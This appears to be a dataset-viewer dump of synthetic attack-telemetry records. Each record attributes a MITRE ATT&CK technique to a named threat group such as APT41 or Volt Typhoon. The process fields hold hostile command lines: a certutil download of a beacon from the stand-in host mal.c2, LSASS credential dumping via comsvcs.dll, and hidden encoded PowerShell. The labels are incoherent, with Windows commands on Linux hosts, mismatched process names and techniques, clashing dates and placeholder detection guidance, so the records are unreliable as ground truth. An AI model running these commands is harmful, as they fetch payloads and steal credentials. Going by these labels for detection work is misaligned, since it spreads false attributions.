text stringlengths 1.13k 1.33k |
|---|
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1071.001 using cloud-native technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Reconnaissance","Defense Evasion"],"technique_id":"T1071.001"},"event_id":"evt_apt41_20250822T073239000Z_0007401","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["TLS","Base64","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.90.120.79","name":"IAM-ROLE-DPCUXOMYAP","os":"Amazon Linux 2"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"7401APT41T1071.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.154.125.80","dst_port":3389,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"rundll32.exe","parent_name":"svchost.exe"},"source":"CloudTrail (DS0028)","timestamp":"2025-01-01T13:26:05.000Z","user":{"name":"svc_ifs4zhzfqsnt","sid":"S-1-5-21-617951569-855294590-4465"}} |
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1071.001 using LOLBin technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Impact","Command and Control","Persistence"],"technique_id":"T1071.001"},"event_id":"evt_apt41_20260121T094048000Z_0007403","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["TLS","WMI","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.241.69.238","name":"IAM-ROLE-NG0X0QBKK0","os":"Windows 11"},"impact":{"business_risk":"Long-term persistence achieved","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"7403APT41T1071.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.64.224.189","dst_port":445,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2693 C:\\temp\\lsass.dmp full","name":"rundll32.exe","parent_name":"explorer.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-01-04T17:26:38.000Z","user":{"name":"azuread\\niehtaokkef9","sid":"S-1-5-21-840592977-175357398-5344"}} |
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1546.003 using fileless technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Command and Control","Defense Evasion"],"technique_id":"T1546.003"},"event_id":"evt_lapsus_20250725T174632000Z_0007405","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["TLS","JA3 Spoof","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.41.72.137","name":"APP-WEB-MN6IZE6TTD","os":"Windows Server 2022"},"impact":{"business_risk":"Cloud environment takeover","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"7405Lapsus$T1546.003"},"network":{"domain":"aws.amazon.com","dst_ip":"1.121.233.205","dst_port":5985,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"mshta.exe","parent_name":"winlogon.exe"},"source":"Sysmon (DS0024)","timestamp":"2025-11-16T11:04:54.000Z","user":{"name":"CORP\\d0p78dj4yf58","sid":"S-1-5-21-271201312-137710329-4802"}} |
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1021.006 using cloud-native technique.","sub_technique":"Windows Remote Management","tactic":["Defense Evasion"],"technique_id":"T1021.006"},"event_id":"evt_mustangpanda_20261122T132450000Z_0007407","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["LOLBin","TLS","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.177.163.152","name":"EC2-INST-W9LW1Z13ST","os":"Ubuntu 22.04"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"7407Mustang PandaT1021.006"},"network":{"domain":"cdn-content.com","dst_ip":"1.79.13.25","dst_port":5985,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2152 C:\\temp\\lsass.dmp full","name":"bitsadmin.exe","parent_name":"svchost.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-01-24T15:41:13.000Z","user":{"name":"azuread\\w4ymeqs30ueu","sid":"S-1-5-21-142884504-591941807-5984"}} |
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1531 using encrypted C2 technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Collection","Initial Access"],"technique_id":"T1531"},"event_id":"evt_apt41_20260821T164428000Z_0007409","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["LOLBin","Base64","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.173.95.230","name":"EC2-INST-5D2K69AKKC","os":"Windows Server 2022"},"impact":{"business_risk":"Data exfiltration channel open","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"7409APT41T1531"},"network":{"domain":"github.com","dst_ip":"1.32.211.243","dst_port":5985,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1394 C:\\temp\\lsass.dmp full","name":"mshta.exe","parent_name":"explorer.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2026-02-05T15:08:13.000Z","user":{"name":"arn:aws:iam::klsjs6ger8bm","sid":"S-1-5-21-385564204-964983747-1897"}} |
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1059.001 using LOLBin technique.","sub_technique":"PowerShell","tactic":["Command and Control","Reconnaissance","Initial Access"],"technique_id":"T1059.001"},"event_id":"evt_fin7_20260417T115147000Z_0007411","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["WMI","LOLBin","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.68.61.203","name":"EC2-INST-ASS5CKHIR3","os":"Windows 11"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"7411FIN7T1059.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.98.161.200","dst_port":3389,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"cmstp.exe","parent_name":"services.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-10-20T22:11:26.000Z","user":{"name":"i-trgiwi1qktvf","sid":"S-1-5-21-672631653-957566708-5273"}} |
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1098.004 using LOLBin technique.","sub_technique":"SSH Authorized Keys","tactic":["Privilege Escalation"],"technique_id":"T1098.004"},"event_id":"evt_unc4841_20251223T201003000Z_0007413","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["WMI","Fileless","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.224.158.97","name":"WIN-FIN-SRV-4EA5VYZP0U","os":"Ubuntu 22.04"},"impact":{"business_risk":"Data exfiltration channel open","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"7413UNC4841T1098.004"},"network":{"domain":"cdn-content.com","dst_ip":"1.59.37.97","dst_port":5985,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"powershell.exe","parent_name":"svchost.exe"},"source":"Sysmon (DS0024)","timestamp":"2025-03-31T00:12:45.000Z","user":{"name":"svc_kvlq1kpx533m","sid":"S-1-5-21-499006939-770373249-5325"}} |
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1570 using cloud-native technique.","sub_technique":"Lateral Tool Transfer","tactic":["Execution","Impact","Collection"],"technique_id":"T1570"},"event_id":"evt_unc4841_20251113T121752000Z_0007415","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["Base64","WMI","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.50.92.113","name":"DB-ORACLE-LPY44VKTYT","os":"Amazon Linux 2"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"7415UNC4841T1570"},"network":{"domain":"aws.amazon.com","dst_ip":"1.8.151.104","dst_port":5985,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 751 C:\\temp\\lsass.dmp full","name":"cmstp.exe","parent_name":"services.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-08-12T23:33:53.000Z","user":{"name":"azuread\\wlldjpp0lnb0","sid":"S-1-5-21-566945537-345212616-6251"}} |
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1546.003 using encrypted C2 technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Reconnaissance","Exfiltration","Impact"],"technique_id":"T1546.003"},"event_id":"evt_scatteredspider_20260414T205412000Z_0007417","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["LOLBin","JA3 Spoof","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.165.213.77","name":"DB-ORACLE-B3HQGBQPWR","os":"Windows Server 2022"},"impact":{"business_risk":"Cloud environment takeover","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"7417Scattered SpiderT1546.003"},"network":{"domain":"cdn-content.com","dst_ip":"1.3.87.149","dst_port":445,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"powershell.exe","parent_name":"svchost.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2026-06-28T20:35:53.000Z","user":{"name":"CORP\\f6fkcs303ioz","sid":"S-1-5-21-204927724-573250655-8576"}} |
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1059.001 using encrypted C2 technique.","sub_technique":"PowerShell","tactic":["Discovery","Execution","Privilege Escalation"],"technique_id":"T1059.001"},"event_id":"evt_apt29_20260729T124728000Z_0007419","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["Base64","JA3 Spoof","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.151.24.97","name":"DB-ORACLE-SNCLBPL1PX","os":"Windows 11"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"7419APT29T1059.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.40.209.155","dst_port":5985,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"certutil.exe","parent_name":"winlogon.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-08-31T09:18:10.000Z","user":{"name":"i-fa49atgxlwbd","sid":"S-1-5-21-964145660-283037287-8779"}} |
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1484.001 using cloud-native technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Reconnaissance","Defense Evasion","Exfiltration"],"technique_id":"T1484.001"},"event_id":"evt_scatteredspider_20250616T074830000Z_0007421","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["Base64","WMI","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.111.97.218","name":"EC2-INST-0QT6ZYC5QX","os":"Ubuntu 22.04"},"impact":{"business_risk":"Cloud environment takeover","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"7421Scattered SpiderT1484.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.69.4.61","dst_port":3389,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"certutil.exe","parent_name":"svchost.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-11-22T03:15:00.000Z","user":{"name":"CORP\\gqryayd7e9n3","sid":"S-1-5-21-783675875-477016984-4390"}} |
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1021.006 using LOLBin technique.","sub_technique":"Windows Remote Management","tactic":["Privilege Escalation","Execution","Lateral Movement"],"technique_id":"T1021.006"},"event_id":"evt_fin7_20260119T133319000Z_0007423","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["TLS","WMI","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.119.213.33","name":"APP-WEB-G7HV91VS9E","os":"Ubuntu 22.04"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"7423FIN7T1021.006"},"network":{"domain":"aws.amazon.com","dst_ip":"1.98.164.135","dst_port":3389,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"powershell.exe","parent_name":"explorer.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-03-25T15:14:25.000Z","user":{"name":"arn:aws:iam::0buqnicdgjay","sid":"S-1-5-21-750237995-104151171-2619"}} |
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1021.006 using LOLBin technique.","sub_technique":"Windows Remote Management","tactic":["Defense Evasion"],"technique_id":"T1021.006"},"event_id":"evt_unc4841_20250129T160611000Z_0007425","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["Base64","JA3 Spoof","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.144.41.93","name":"IAM-ROLE-Y6574SGJOY","os":"Windows Server 2022"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"7425UNC4841T1021.006"},"network":{"domain":"cdn-content.com","dst_ip":"1.47.254.95","dst_port":443,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3596 C:\\temp\\lsass.dmp full","name":"wmic.exe","parent_name":"services.exe"},"source":"CloudTrail (DS0028)","timestamp":"2025-12-01T16:15:28.000Z","user":{"name":"i-wfjtvg3bq9zx","sid":"S-1-5-21-969209767-937003990-7271"}} |
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1531 using fileless technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Defense Evasion"],"technique_id":"T1531"},"event_id":"evt_apt41_20250125T214100000Z_0007427","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","WMI","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.70.97.101","name":"EC2-INST-9MJ6D2KTP6","os":"Windows Server 2022"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"7427APT41T1531"},"network":{"domain":"cdn-content.com","dst_ip":"1.0.253.227","dst_port":5985,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"wmic.exe","parent_name":"svchost.exe"},"source":"Network Connection (DS0029)","timestamp":"2026-10-23T03:09:18.000Z","user":{"name":"CORP\\4ltbgykufbwz","sid":"S-1-5-21-210667458-292717667-2968"}} |
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1531 using LOLBin technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Reconnaissance","Privilege Escalation","Credential Access"],"technique_id":"T1531"},"event_id":"evt_lapsus_20250510T162835000Z_0007429","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","WMI","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.222.162.44","name":"AZURE-VM-316QVWA766","os":"Ubuntu 22.04"},"impact":{"business_risk":"Domain dominance","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"7429Lapsus$T1531"},"network":{"domain":"update.microsoft.com","dst_ip":"1.124.20.245","dst_port":443,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2247 C:\\temp\\lsass.dmp full","name":"mshta.exe","parent_name":"explorer.exe"},"source":"CloudTrail (DS0028)","timestamp":"2026-04-29T14:24:00.000Z","user":{"name":"azuread\\fg7sg1y5hc4f","sid":"S-1-5-21-225475076-962026172-8659"}} |
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1021.006 using encrypted C2 technique.","sub_technique":"Windows Remote Management","tactic":["Initial Access","Privilege Escalation"],"technique_id":"T1021.006"},"event_id":"evt_volttyphoon_20250821T092153000Z_0007431","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["Fileless","TLS","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.152.32.21","name":"IAM-ROLE-VRUE83XCFR","os":"Windows 11"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"7431Volt TyphoonT1021.006"},"network":{"domain":"aws.amazon.com","dst_ip":"1.49.230.67","dst_port":445,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3346 C:\\temp\\lsass.dmp full","name":"bitsadmin.exe","parent_name":"services.exe"},"source":"Windows Security Log","timestamp":"2025-03-16T01:02:31.000Z","user":{"name":"svc_4pb2z6hosbpe","sid":"S-1-5-21-543453812-653099441-9075"}} |
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1071.001 using cloud-native technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Collection","Impact"],"technique_id":"T1071.001"},"event_id":"evt_lapsus_20260912T152155000Z_0007433","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","Base64","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.59.86.39","name":"APP-WEB-Z480W3G0MM","os":"Ubuntu 22.04"},"impact":{"business_risk":"Long-term persistence achieved","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"7433Lapsus$T1071.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.27.21.71","dst_port":5985,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"mshta.exe","parent_name":"svchost.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-05-19T21:55:56.000Z","user":{"name":"CORP\\ssfdq4lx7ayt","sid":"S-1-5-21-316065649-823192789-9281"}} |
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1003.001 using encrypted C2 technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Defense Evasion","Execution"],"technique_id":"T1003.001"},"event_id":"evt_volttyphoon_20260729T200955000Z_0007435","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["Base64","WMI","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.113.216.75","name":"DB-ORACLE-W8C1NJXBMC","os":"Ubuntu 22.04"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"7435Volt TyphoonT1003.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.81.143.11","dst_port":5985,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"mshta.exe","parent_name":"winlogon.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2026-10-26T20:45:49.000Z","user":{"name":"CORP\\68kptwae2x9k","sid":"S-1-5-21-695622903-931892972-6829"}} |
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1071.001 using encrypted C2 technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Defense Evasion","Impact"],"technique_id":"T1071.001"},"event_id":"evt_unc4841_20250301T190158000Z_0007437","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","WMI","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.185.159.241","name":"IAM-ROLE-KH63HUJZ6U","os":"Windows Server 2022"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"7437UNC4841T1071.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.176.67.210","dst_port":443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"mshta.exe","parent_name":"svchost.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2026-12-17T08:06:07.000Z","user":{"name":"azuread\\vzoo48a2ia2n","sid":"S-1-5-21-738073512-390789536-6037"}} |
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1531 using fileless technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Lateral Movement","Impact"],"technique_id":"T1531"},"event_id":"evt_fin7_20260609T034413000Z_0007439","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["Base64","TLS","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.94.11.244","name":"DB-ORACLE-HFIBJS7DTR","os":"Windows Server 2022"},"impact":{"business_risk":"Domain dominance","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"7439FIN7T1531"},"network":{"domain":"update.microsoft.com","dst_ip":"1.50.191.198","dst_port":443,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"powershell.exe","parent_name":"services.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-01-13T06:34:45.000Z","user":{"name":"arn:aws:iam::212nzcoikrgn","sid":"S-1-5-21-591982388-499176257-6348"}} |
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1003.001 using cloud-native technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Discovery","Reconnaissance"],"technique_id":"T1003.001"},"event_id":"evt_unc4841_20261010T104518000Z_0007441","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","LOLBin","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.253.200.145","name":"WIN-FIN-SRV-3XY7K73XFB","os":"Amazon Linux 2"},"impact":{"business_risk":"Data exfiltration channel open","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"7441UNC4841T1003.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.51.229.180","dst_port":443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2426 C:\\temp\\lsass.dmp full","name":"powershell.exe","parent_name":"services.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-09-12T18:08:59.000Z","user":{"name":"arn:aws:iam::e839yrvket8o","sid":"S-1-5-21-451837072-847699699-5977"}} |
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1566.001 using encrypted C2 technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Exfiltration"],"technique_id":"T1566.001"},"event_id":"evt_lapsus_20250921T062746000Z_0007443","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["LOLBin","Fileless","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.145.104.221","name":"EC2-INST-SVS4Z7M7M0","os":"Amazon Linux 2"},"impact":{"business_risk":"Long-term persistence achieved","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"7443Lapsus$T1566.001"},"network":{"domain":"github.com","dst_ip":"1.63.4.188","dst_port":3389,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1091 C:\\temp\\lsass.dmp full","name":"powershell.exe","parent_name":"svchost.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-03-05T03:25:33.000Z","user":{"name":"CORP\\jcp0wzfzshx9","sid":"S-1-5-21-240066010-133755150-2000"}} |
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1570 using LOLBin technique.","sub_technique":"Lateral Tool Transfer","tactic":["Lateral Movement","Defense Evasion","Persistence"],"technique_id":"T1570"},"event_id":"evt_mustangpanda_20250727T082653000Z_0007445","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","LOLBin","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.137.180.24","name":"DB-ORACLE-8QCI6U3L73","os":"Amazon Linux 2"},"impact":{"business_risk":"Cloud environment takeover","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"7445Mustang PandaT1570"},"network":{"domain":"aws.amazon.com","dst_ip":"1.68.76.52","dst_port":443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"cmstp.exe","parent_name":"explorer.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-09-13T09:16:42.000Z","user":{"name":"i-bs76yykpocgq","sid":"S-1-5-21-387916164-877636071-8967"}} |
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1071.001 using encrypted C2 technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Initial Access","Defense Evasion"],"technique_id":"T1071.001"},"event_id":"evt_apt29_20260112T104728000Z_0007447","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["Fileless","JA3 Spoof","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.195.197.190","name":"APP-WEB-NN4C68IHJE","os":"Windows 11"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"7447APT29T1071.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.1.3.163","dst_port":8443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe 